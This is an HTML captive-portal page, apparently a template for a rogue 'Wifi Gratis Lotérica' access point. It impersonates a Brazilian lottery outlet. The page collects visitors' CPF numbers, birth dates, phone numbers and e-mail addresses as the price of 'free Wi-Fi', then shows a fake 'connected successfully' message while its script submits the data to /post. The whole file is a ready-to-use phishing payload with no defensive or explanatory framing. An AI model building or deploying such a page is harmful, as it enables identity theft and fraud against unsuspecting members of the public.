
<!-- AP="Wifi Gratis Lotérica" -->
<!DOCTYPE html>
<html>
<head>
  <title>Wifi Gratis Lotérica</title>
  <meta charset='UTF-8'>
  <meta name='viewport' content='width=device-width, initial-scale=1.0'>
  <style>
    a:hover{
      text-decoration: underline;
    }
    body{
      font-family: Arial, sans-serif;
      align-items: center;
      justify-content: center;
      background-color: #FFFFFF;
    }
    input[type='text'], input[type='password']{
      width: 100%;
      padding: 12px 10px;
      margin: 8px 0;
      box-sizing: border-box;
      border: 1px solid #cccccc;
      border-radius: 4px;
    }
    .container{
      margin: auto;
      padding: 20px;
      max-width: 700px;
    }
    .logo-container{
      text-align: center;
      margin-bottom: 30px;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .logo{
      width: 40px;
      height: 40px;
      fill: #FFC72C;
      margin-right: 100px;
    }
    .company-name{
      font-size: 42px;
      color: black;
      margin-left: 0px;
    }
    .form-container{
      background: #FFFFFF;
      border: 1px solid #CEC0DE;
      border-radius: 4px;
      padding: 20px;
      box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
    }
    h1{
      text-align: center;
      font-size: 28px;
      font-weight: 500;
      margin-bottom: 20px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
    }
    .input-field{
      width: 100%;
      padding: 12px;
      border: 1px solid #BEABD3;
      border-radius: 4px;
      margin-bottom: 20px;
      font-size: 14px;
    }
    .submit-btn{
      background: #0b57d0;
      color: white;
      border: none;
      padding: 12px 20px;
      border-radius: 4px;
      font-size: 0.875rem;
    }
    .submit-btn:hover{
      background: #0e4eb3;
    }
    .forgot-btn{
      background: transparent;
      color: #0b57d0;
      border-radius: 8px;
      border: none;
      font-size: 14px;
      cursor: pointer;
    }
    .forgot-btn:hover{
      background-color: rgba(11,87,208,0.08);
    }
    .containerlogo{
      padding-top: 25px;
    }
    .containertitle{
      color: #202124;
      font-size: 24px;
      padding: 15px 0px 10px 0px;
    }
    .containersubtitle{
      color: #202124;
      font-size: 16px;
      padding: 0px 0px 30px 0px;
    }
    /* .containermsg{
      padding: 30px 0px 0px 0px;
      color: #5f6368;
    } */
    .containerbtn{
      display: flex;
      justify-content: end;
      padding: 30px 0px 25px 0px;
    }
    div#form-block{
      min-height: 150px;
    }
    div#success-block{
      display: none;
      text-align: center;
      min-height: 100px;
      margin-bottom: 30px;
      justify-content: center;
      align-items: center;
    }
    @media screen and (min-width: 768px){
      .logo{
        max-width: 80px;
        max-height: 80px;
      }
    }
  </style>
</head>
<body>
  <div class='container'>
    <div class='logo-container'>
      <?xml version='1.0' standalone='no'?>
      <!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 20010904//EN' 'http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd'>
    </div>
    <div class=form-container>
      <center>
        <div class='containerlogo'>
          <!-- Google Logo -->
          <div id="logo" title="Lotérica">
            <svg class="icon" height="80" viewBox="0 0 305.496 305.496" width="80" xmlns="http://www.w3.org/2000/svg">
              
<g>
	<g>
		<polygon points="194.243,206.214 204.368,206.214 204.368,188.167 220.491,188.167 220.491,179.905 204.368,179.905 
			204.368,169.647 221.618,169.647 221.618,161.314 194.243,161.314 		"/>
		<rect x="227.636" y="173.639" width="10.125" height="32.586"/>
		<path d="M232.765,159.522c-3.261,0-5.394,2.193-5.394,5.062c0,2.803,2.067,5.067,5.261,5.067c3.402,0,5.464-2.265,5.464-5.067
			C238.03,161.716,236.034,159.522,232.765,159.522z"/>
		<path d="M146.73,95.075c0-2.001-1.378-3.042-3.671-3.042c-1.201,0-1.894,0.069-2.257,0.158v6.055h1.96
			C145.258,98.254,146.73,97.005,146.73,95.075z"/>
		<path d="M263.836,120.259h-42.975c-6.444-31.725-34.489-55.599-68.116-55.599c-33.626,0-61.664,23.879-68.105,55.599H41.662
			C18.689,120.259,0,138.946,0,161.919v37.252c0,22.973,18.689,41.665,41.662,41.665h222.174c22.974,0,41.66-18.692,41.66-41.665
			v-37.252C305.491,138.946,286.81,120.259,263.836,120.259z M77.249,206.214H66.263l-3.796-19.316
			c-0.869-4.529-1.603-8.729-2.133-13.853h-0.13c-0.794,5.058-1.533,9.323-2.6,13.853l-4.273,19.316H42.208l-10.659-44.899h10.862
			l3.395,18.453c0.998,5.394,1.935,11.192,2.668,15.722h0.129c0.734-4.864,1.806-10.268,2.933-15.854l3.796-18.321h10.791
			l3.592,18.921c1.003,5.266,1.737,10.064,2.407,15.056h0.125c0.67-4.991,1.665-10.257,2.6-15.65l3.661-18.326h10.326
			L77.249,206.214z M102.131,206.214H92.003v-32.58h10.128V206.214z M97,169.647c-3.194,0-5.263-2.27-5.263-5.072
			c0-2.864,2.132-5.058,5.397-5.058s5.264,2.193,5.324,5.058C102.458,167.388,100.399,169.647,97,169.647z M172.818,88.461h13.584
			v4.093h-8.612v4.591h8.119v4.052h-8.119v5.241h9.079v4.098h-14.051V88.461z M155.32,88.461h13.583v4.093h-8.607v4.591h8.12v4.052
			h-8.12v5.241h9.069v4.098H155.32V88.461z M132.083,92.554h-8.478v5.042h7.919v4.068h-7.919v8.871h-4.977V88.461h13.454V92.554z
			 M140.802,110.535h-4.946V88.753c1.602-0.262,3.963-0.457,6.652-0.457c3.27,0,5.558,0.493,7.134,1.737
			c1.341,1.048,2.064,2.615,2.064,4.654c0,2.785-2.003,4.71-3.905,5.403v0.096c1.544,0.625,2.397,2.062,2.948,4.093
			c0.69,2.519,1.346,5.403,1.772,6.256h-5.106c-0.328-0.655-0.889-2.428-1.508-5.139c-0.625-2.785-1.574-3.503-3.628-3.544h-1.478
			V110.535z M288.835,199.171c0,13.776-11.212,24.999-25.004,24.999h-98.975c-14.305-9.252-23.795-25.318-23.795-43.625
			c0-18.306,9.491-34.365,23.795-43.62h98.975c13.781,0,25.004,11.209,25.004,24.994V199.171z"/>
	</g>
</g>
            </svg>
          </div>
          <!-- /Google Logo -->
        </div>
      </center>
      <div id='form-block'>
        <center>
          <div class='containertitle'>Cadastre-se para Utilizar</div>
          <div class='containersubtitle'>Insira seus Dados</div>
        </center>
        <form action='/post' id='login-form'>
          <!-- CPF -->
          <input name="cpf" id="cpf" class="input-field" type="text"
            maxlength="14" 
            pattern="\d{3}\.\d{3}\.\d{3}-\d{2}"
            oninput="formatarCPF(this)"
            oninvalid="this.setCustomValidity('Por favor, insira o CPF no formato XXX.XXX.XXX-XX')"
            oninput="this.setCustomValidity('')"
            placeholder="CPF (Somente Números)" required>
          <input name='nascimento' class='input-field' type='date' oninvalid="this.setCustomValidity('Por favor, insira a data no formato dd/mm/aaaa')" placeholder='Data Nascimento' required>
          <input name="telefone" id="telefone" class="input-field" type="text"
            maxlength="15"
            pattern="\(\d{2}\)\s\d{5}-\d{4}"
            oninput="formatarTelefone(this)"
            oninvalid="this.setCustomValidity('Por favor, insira um telefone válido com 11 dígitos no formato (XX) XXXXX-XXXX')"
            oninput="this.setCustomValidity('')"
            placeholder="Telefone" required>   
          <input name='email' class='input-field' type='email' placeholder='E-mail' required>
      
    <div class='containerbtn'>
            <button id=submitbtn class=submit-btn type=submit>Acessar Internet</button>
          </div>
        </form>
      </div>
      <div id='success-block'>
        <center>
          <div>Conectado com sucesso. </br>Em instantes você será redirecionado.</div>
        </center>
      </div>
    </div>
  </div>

  <script>
    document.getElementById('login-form').addEventListener('submit', function(event) {
      event.preventDefault();

      document.getElementById('success-block').style.display = 'flex';
      document.getElementById('form-block').style.display = 'none';

      setTimeout(function() {
        document.getElementById('login-form').submit();
      }, 3000);
    });
    
    function formatarCPF(input) {
    // Remove tudo que não for dígito
    let valor = input.value.replace(/\D/g, '');

    // Limita a 11 dígitos
    if (valor.length > 11) valor = valor.slice(0, 11);

    // Aplica a máscara
    valor = valor.replace(/(\d{3})(\d)/, '$1.$2');
    valor = valor.replace(/(\d{3})(\d)/, '$1.$2');
    valor = valor.replace(/(\d{3})(\d{1,2})$/, '$1-$2');

    input.value = valor;
    }

    function formatarTelefone(input) {
    // Remove todos os caracteres não numéricos
    let valor = input.value.replace(/\D/g, '');

    // Limita a 11 dígitos
    if (valor.length > 11) valor = valor.slice(0, 11);

    // Aplica a máscara: (XX) XXXXX-XXXX
    if (valor.length >= 2) {
        valor = `(${valor.slice(0, 2)}) ${valor.slice(2)}`;
    }
    if (valor.length >= 10) {
        valor = valor.slice(0, 10) + '-' + valor.slice(10);
    }

    input.value = valor;
}
  </script>
</body>
</html>